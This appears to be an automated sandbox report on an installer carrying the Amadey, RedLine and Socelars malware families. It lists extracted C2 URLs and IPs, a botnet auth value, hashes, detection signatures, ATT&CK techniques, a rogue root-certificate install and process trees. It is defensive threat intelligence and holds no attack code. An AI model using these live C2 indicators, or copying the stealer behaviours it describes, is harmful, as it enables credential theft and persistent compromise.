amadey | c47ed735f510e5df415c1c0cec0f7108897f0f792f4a7736e4ed4671aca3e3c1

Analysis

max time kernel
50s
max time network
291s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
04-06-2022 11:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

install_setup.exe
Size

7.4MB
MD5

11b61f379a2946224854e1a22bf87483
SHA1

35976ccdc24c993875238c7d46592e5f26863c4f
SHA256

2fad80640248ef14d7c7759ae16ade3b8953120ead22a6397d12cc8a9559b424
SHA512

d2eae45e8c32aaf7ff96e626b541b9cc75879e2c0de724bf186788ed7343ede962f3c116ddadda59be65b2f469a138789ce1c683fd5f8bd3b3854953daa70148

Score

10^/10

amadey redline socelars newmedia discovery infostealer spyware stealer suricata trojan vmprotect

Malware Config

Extracted

Family

socelars

https://iplogger.org/1NsYz7/

https://iplogger.org/1ibws7/

https://iplogger.org/1XJq97/

https://sa-us-bucket.s3.us-east-2.amazonaws.com/ujfreids61/

Extracted

Family

amadey

Version

3.20

marobast.ws/b3m2fVVs0/index.php

pinedisc.ws/b3m2fVVs0/index.php

generiba.ws/b3m2fVVs0/index.php

Extracted

Family

redline

Botnet

newmedia

141.95.211.151:24029

Attributes

auth_value
1357621094eca5effbae54426cf56251

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect Amadey credential stealer module 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5348-373-0x0000000000760000-0x0000000000784000-memory.dmp	amadey_cred_module

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1444	3268	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5544	3268	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5708	3268	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2144-336-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b424480f43_d579e65.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b424480f43_d579e65.exe	family_socelars

suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
suricata
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata
Downloads MZ/PE file

Executes dropped EXE 21 IoCs

Processes:

setup_installer.exesetup_install.exe629b423d8d4cc_4985f9d62b.exe629b423cc2898_2a68ceba.exe629b423f41328_e47c3b.exe629b423c06757_b31ed07.exe629b423e98b72_ddc9c9a.exe629b424128480_ea39154.exe629b424262671_af550a21f.exe629b42452ea65_084d112c.exe629b4245da557_66e2cbf.exe629b424833bdc_2e9304e7.exe629b424480f43_d579e65.exe629b4246ab171_537a2a42d.exe629b423e98b72_ddc9c9a.tmp629b4245da557_66e2cbf.exe629b424128480_ea39154.exelBo5.exe4486665847.exeorxds.exe422037.exe

pid	process
1112	setup_installer.exe
1504	setup_install.exe
1292	629b423d8d4cc_4985f9d62b.exe
3460	629b423cc2898_2a68ceba.exe
1380	629b423f41328_e47c3b.exe
1284	629b423c06757_b31ed07.exe
4232	629b423e98b72_ddc9c9a.exe
2368	629b424128480_ea39154.exe
1700	629b424262671_af550a21f.exe
4784	629b42452ea65_084d112c.exe
4432	629b4245da557_66e2cbf.exe
816	629b424833bdc_2e9304e7.exe
2660	629b424480f43_d579e65.exe
5104	629b4246ab171_537a2a42d.exe
3496	629b423e98b72_ddc9c9a.tmp
3692	629b4245da557_66e2cbf.exe
1796	629b424128480_ea39154.exe
1272	lBo5.exe
1008	4486665847.exe
616	orxds.exe
1940	422037.exe

VMProtect packed file 5 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b424262671_af550a21f.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b424262671_af550a21f.exe	vmprotect
behavioral2/memory/1700-197-0x0000000140000000-0x0000000140679000-memory.dmp	vmprotect
behavioral2/memory/64-389-0x0000000140000000-0x000000014067B000-memory.dmp	vmprotect
behavioral2/memory/5300-400-0x0000000140000000-0x0000000140679000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

install_setup.exe629b423cc2898_2a68ceba.exe629b423f41328_e47c3b.exesetup_installer.exe629b4245da557_66e2cbf.exe629b423c06757_b31ed07.exe629b4246ab171_537a2a42d.exe4486665847.exeorxds.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	install_setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	629b423cc2898_2a68ceba.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	629b423f41328_e47c3b.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	629b4245da557_66e2cbf.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	629b423c06757_b31ed07.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	629b4246ab171_537a2a42d.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	4486665847.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	orxds.exe

Loads dropped DLL 7 IoCs

Processes:

setup_install.exe629b423e98b72_ddc9c9a.tmprundll32.exerundll32.exerundll32.exe

pid process

1504 setup_install.exe
3496 629b423e98b72_ddc9c9a.tmp
2520 rundll32.exe
2520 rundll32.exe
5072 rundll32.exe
4960 rundll32.exe
4960 rundll32.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

5980 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 130.61.117.123
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

169 ip-api.com
303 api.2ip.ua
304 api.2ip.ua
351 api.2ip.ua
13 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

629b424128480_ea39154.exe

description pid process target process

PID 2368 set thread context of 1796 2368 629b424128480_ea39154.exe 629b424128480_ea39154.exe

pid	process
1504	setup_install.exe
3496	629b423e98b72_ddc9c9a.tmp
2520	rundll32.exe
2520	rundll32.exe
5072	rundll32.exe
4960	rundll32.exe
4960	rundll32.exe

pid	process
5980	icacls.exe

description	ioc
Destination IP	130.61.117.123

flow	ioc
169	ip-api.com
303	api.2ip.ua
304	api.2ip.ua
351	api.2ip.ua
13	ip-api.com

description	pid	process	target process
PID 2368 set thread context of 1796	2368	629b424128480_ea39154.exe	629b424128480_ea39154.exe

Drops file in Program Files directory 10 IoCs

Processes:

629b424480f43_d579e65.exe

description	ioc	process
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\background.js	629b424480f43_d579e65.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\content.js	629b424480f43_d579e65.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\jquery-3.3.1.min.js	629b424480f43_d579e65.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\mode-ecb.js	629b424480f43_d579e65.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\background.html	629b424480f43_d579e65.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\icon.png	629b424480f43_d579e65.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\aes.js	629b424480f43_d579e65.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\pad-nopadding.js	629b424480f43_d579e65.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\manifest.json	629b424480f43_d579e65.exe
File opened for modification	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\background.js	629b424480f43_d579e65.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 40 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2712	1700	WerFault.exe	629b424262671_af550a21f.exe
612	816	WerFault.exe	629b424833bdc_2e9304e7.exe
224	5104	WerFault.exe	629b4246ab171_537a2a42d.exe
1472	5072	WerFault.exe	rundll32.exe
756	816	WerFault.exe	629b424833bdc_2e9304e7.exe
2144	816	WerFault.exe	629b424833bdc_2e9304e7.exe
1732	816	WerFault.exe	629b424833bdc_2e9304e7.exe
4180	816	WerFault.exe	629b424833bdc_2e9304e7.exe
2952	816	WerFault.exe	629b424833bdc_2e9304e7.exe
3144	816	WerFault.exe	629b424833bdc_2e9304e7.exe
400	816	WerFault.exe	629b424833bdc_2e9304e7.exe
116	816	WerFault.exe	629b424833bdc_2e9304e7.exe
1224	4424	WerFault.exe	GcleanerEU.exe
5480	4424	WerFault.exe	GcleanerEU.exe
5604	4332	WerFault.exe	gcleaner.exe
5868	5620	WerFault.exe	rundll32.exe
5324	4424	WerFault.exe	GcleanerEU.exe
5424	4332	WerFault.exe	gcleaner.exe
5620	4424	WerFault.exe	GcleanerEU.exe
5980	4332	WerFault.exe	gcleaner.exe
3296	64	WerFault.exe	rmaa1045.exe
5184	5300	WerFault.exe	rtst1077.exe
6004	4332	WerFault.exe	gcleaner.exe
6040	4424	WerFault.exe	GcleanerEU.exe
5444	5808	WerFault.exe	rundll32.exe
6092	4332	WerFault.exe	gcleaner.exe
5232	4424	WerFault.exe	GcleanerEU.exe
5252	4332	WerFault.exe	gcleaner.exe
6060	4424	WerFault.exe	GcleanerEU.exe
5208	4332	WerFault.exe	gcleaner.exe
1768	4424	WerFault.exe	GcleanerEU.exe
2708	4332	WerFault.exe	gcleaner.exe
5584	4424	WerFault.exe	GcleanerEU.exe
6116	4332	WerFault.exe	gcleaner.exe
5348	5712	WerFault.exe	logger2.exe
532	5872	WerFault.exe	logger2.exe
1356	4824	WerFault.exe	logger2.exe
4024	3300	WerFault.exe	256E.exe
5996	628	WerFault.exe	Routes.exe
2500	1016	WerFault.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

629b423d8d4cc_4985f9d62b.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	629b423d8d4cc_4985f9d62b.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	629b423d8d4cc_4985f9d62b.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	629b423d8d4cc_4985f9d62b.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

422037.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	422037.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	422037.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2884 schtasks.exe
2264 schtasks.exe
4028 schtasks.exe
3668 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3120 timeout.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

5840 tasklist.exe
Kills process with taskkill 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4324 taskkill.exe
2160 taskkill.exe
5940 taskkill.exe
5732 taskkill.exe
2344 taskkill.exe
1536 taskkill.exe
Modifies registry class 1 IoCs

Processes:

629b423c06757_b31ed07.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings 629b423c06757_b31ed07.exe

pid	process
2884	schtasks.exe
2264	schtasks.exe
4028	schtasks.exe
3668	schtasks.exe

pid	process
3120	timeout.exe

pid	process
5840	tasklist.exe

pid	process
4324	taskkill.exe
2160	taskkill.exe
5940	taskkill.exe
5732	taskkill.exe
2344	taskkill.exe
1536	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings	629b423c06757_b31ed07.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

629b424480f43_d579e65.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	629b424480f43_d579e65.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	629b424480f43_d579e65.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5864 PING.EXE
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
5864	PING.EXE

description	flow	ioc
HTTP User-Agent header	20	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

629b423d8d4cc_4985f9d62b.exepowershell.exe

pid	process
1292	629b423d8d4cc_4985f9d62b.exe
1292	629b423d8d4cc_4985f9d62b.exe
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
1224	powershell.exe
1224	powershell.exe
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

629b423d8d4cc_4985f9d62b.exe

pid process

1292 629b423d8d4cc_4985f9d62b.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

629b424480f43_d579e65.exepowershell.exe629b423f41328_e47c3b.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeCreateTokenPrivilege	2660	629b424480f43_d579e65.exe
Token: SeAssignPrimaryTokenPrivilege	2660	629b424480f43_d579e65.exe
Token: SeLockMemoryPrivilege	2660	629b424480f43_d579e65.exe
Token: SeIncreaseQuotaPrivilege	2660	629b424480f43_d579e65.exe
Token: SeMachineAccountPrivilege	2660	629b424480f43_d579e65.exe
Token: SeTcbPrivilege	2660	629b424480f43_d579e65.exe
Token: SeSecurityPrivilege	2660	629b424480f43_d579e65.exe
Token: SeTakeOwnershipPrivilege	2660	629b424480f43_d579e65.exe
Token: SeLoadDriverPrivilege	2660	629b424480f43_d579e65.exe
Token: SeSystemProfilePrivilege	2660	629b424480f43_d579e65.exe
Token: SeSystemtimePrivilege	2660	629b424480f43_d579e65.exe
Token: SeProfSingleProcessPrivilege	2660	629b424480f43_d579e65.exe
Token: SeIncBasePriorityPrivilege	2660	629b424480f43_d579e65.exe
Token: SeCreatePagefilePrivilege	2660	629b424480f43_d579e65.exe
Token: SeCreatePermanentPrivilege	2660	629b424480f43_d579e65.exe
Token: SeBackupPrivilege	2660	629b424480f43_d579e65.exe
Token: SeRestorePrivilege	2660	629b424480f43_d579e65.exe
Token: SeShutdownPrivilege	2660	629b424480f43_d579e65.exe
Token: SeDebugPrivilege	2660	629b424480f43_d579e65.exe
Token: SeAuditPrivilege	2660	629b424480f43_d579e65.exe
Token: SeSystemEnvironmentPrivilege	2660	629b424480f43_d579e65.exe
Token: SeChangeNotifyPrivilege	2660	629b424480f43_d579e65.exe
Token: SeRemoteShutdownPrivilege	2660	629b424480f43_d579e65.exe
Token: SeUndockPrivilege	2660	629b424480f43_d579e65.exe
Token: SeSyncAgentPrivilege	2660	629b424480f43_d579e65.exe
Token: SeEnableDelegationPrivilege	2660	629b424480f43_d579e65.exe
Token: SeManageVolumePrivilege	2660	629b424480f43_d579e65.exe
Token: SeImpersonatePrivilege	2660	629b424480f43_d579e65.exe
Token: SeCreateGlobalPrivilege	2660	629b424480f43_d579e65.exe
Token: 31	2660	629b424480f43_d579e65.exe
Token: 32	2660	629b424480f43_d579e65.exe
Token: 33	2660	629b424480f43_d579e65.exe
Token: 34	2660	629b424480f43_d579e65.exe
Token: 35	2660	629b424480f43_d579e65.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	1380	629b423f41328_e47c3b.exe
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeDebugPrivilege	1536	taskkill.exe
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeDebugPrivilege	4324	taskkill.exe
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

629b4245da557_66e2cbf.exe629b4245da557_66e2cbf.exe

pid process

4432 629b4245da557_66e2cbf.exe
4432 629b4245da557_66e2cbf.exe
3692 629b4245da557_66e2cbf.exe
3692 629b4245da557_66e2cbf.exe

pid	process
4432	629b4245da557_66e2cbf.exe
4432	629b4245da557_66e2cbf.exe
3692	629b4245da557_66e2cbf.exe
3692	629b4245da557_66e2cbf.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

install_setup.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1464 wrote to memory of 1112	1464	install_setup.exe	setup_installer.exe
PID 1464 wrote to memory of 1112	1464	install_setup.exe	setup_installer.exe
PID 1464 wrote to memory of 1112	1464	install_setup.exe	setup_installer.exe
PID 1112 wrote to memory of 1504	1112	setup_installer.exe	setup_install.exe
PID 1112 wrote to memory of 1504	1112	setup_installer.exe	setup_install.exe
PID 1112 wrote to memory of 1504	1112	setup_installer.exe	setup_install.exe
PID 1504 wrote to memory of 4772	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 4772	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 4772	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 4660	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 4660	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 4660	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 1832	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 1832	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 1832	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 4548	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 4548	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 4548	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 4592	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 4592	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 4592	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 3128	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 3128	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 3128	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 628	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 628	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 628	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 1156	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 1156	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 1156	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 888	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 888	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 888	1504	setup_install.exe	cmd.exe
PID 4548 wrote to memory of 1292	4548	cmd.exe	629b423d8d4cc_4985f9d62b.exe
PID 4548 wrote to memory of 1292	4548	cmd.exe	629b423d8d4cc_4985f9d62b.exe
PID 4548 wrote to memory of 1292	4548	cmd.exe	629b423d8d4cc_4985f9d62b.exe
PID 1504 wrote to memory of 1884	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 1884	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 1884	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 1776	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 1776	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 1776	1504	setup_install.exe	cmd.exe
PID 1832 wrote to memory of 3460	1832	cmd.exe	629b423cc2898_2a68ceba.exe
PID 1832 wrote to memory of 3460	1832	cmd.exe	629b423cc2898_2a68ceba.exe
PID 1832 wrote to memory of 3460	1832	cmd.exe	629b423cc2898_2a68ceba.exe
PID 3128 wrote to memory of 1380	3128	cmd.exe	629b423f41328_e47c3b.exe
PID 3128 wrote to memory of 1380	3128	cmd.exe	629b423f41328_e47c3b.exe
PID 3128 wrote to memory of 1380	3128	cmd.exe	629b423f41328_e47c3b.exe
PID 4660 wrote to memory of 1284	4660	cmd.exe	629b423c06757_b31ed07.exe
PID 4660 wrote to memory of 1284	4660	cmd.exe	629b423c06757_b31ed07.exe
PID 4660 wrote to memory of 1284	4660	cmd.exe	629b423c06757_b31ed07.exe
PID 4592 wrote to memory of 4232	4592	cmd.exe	629b423e98b72_ddc9c9a.exe
PID 4592 wrote to memory of 4232	4592	cmd.exe	629b423e98b72_ddc9c9a.exe
PID 4592 wrote to memory of 4232	4592	cmd.exe	629b423e98b72_ddc9c9a.exe
PID 628 wrote to memory of 2368	628	cmd.exe	629b424128480_ea39154.exe
PID 628 wrote to memory of 2368	628	cmd.exe	629b424128480_ea39154.exe
PID 628 wrote to memory of 2368	628	cmd.exe	629b424128480_ea39154.exe
PID 1504 wrote to memory of 1308	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 1308	1504	setup_install.exe	cmd.exe
PID 1504 wrote to memory of 1308	1504	setup_install.exe	cmd.exe
PID 4772 wrote to memory of 1224	4772	cmd.exe	powershell.exe
PID 4772 wrote to memory of 1224	4772	cmd.exe	powershell.exe
PID 4772 wrote to memory of 1224	4772	cmd.exe	powershell.exe
PID 1504 wrote to memory of 3296	1504	setup_install.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\install_setup.exe
"C:\Users\Admin\AppData\Local\Temp\install_setup.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1464

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1112

